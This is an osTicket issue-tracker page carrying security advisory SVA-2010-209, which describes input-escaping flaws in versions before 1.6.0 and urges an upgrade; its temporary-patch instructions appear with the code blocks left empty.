Ask not what osTicket community can do for you - ask what you can do for osTicket community
|
|||||||
| osTicket SVA-2010-209 | ||||
|---|---|---|---|---|
Category Unknown |
Affected Version 1.6 rc5 |
Priority 1 - Highest |
||
Status fixed |
Fixed Version 1.6.0 (Stable) |
|||
Submitted 02-09-2010 |
||||
|
||||
02-09-2010 01:17 PM
|
|
|
|
|
osTicket SVA-2010-209
osTicket prior to v1.6.0 ST fails to properly handle or/and escape some user input prior to being displayed/used. This could potentially allow staff to unintentionally execute scripts or actions written by an attacker, causing arbitrary HTML injection and/or script code and possibly carry out an SQL injection. Staff level authentication and activity is required to initioante the attacks.
The security risk is moderately critical and for this reason we strongly recommend upgrading to the latest version (osTicket v1.6 Stable) as soon as possible. If you are unable to upgrade immediately, you should patch your current installation until you are able to do a complete upgrade. Below are instructions on how to temporarily patch osTicket v1.6 RC1-RC5; * In scp/admin.php line 698 Replace PHP Code:
PHP Code:
Maintain the directory hierarchy to make sure files are overwritten Full upgrade is strongly advised. To contact osTicket developers regarding security related issues or any concerns, please use the form at http://osticket.com/support/contact.php Credit: Nahuel Grisolia - CEH nahuel.grisolia@gmail.com 
|
|
02-09-2010 01:45 PM
|
| Issue Changed by peter |
|
 |
| Issue Tools |
|---|
 Subscribe to this issue |
All times are GMT -4. The time now is 01:30 PM.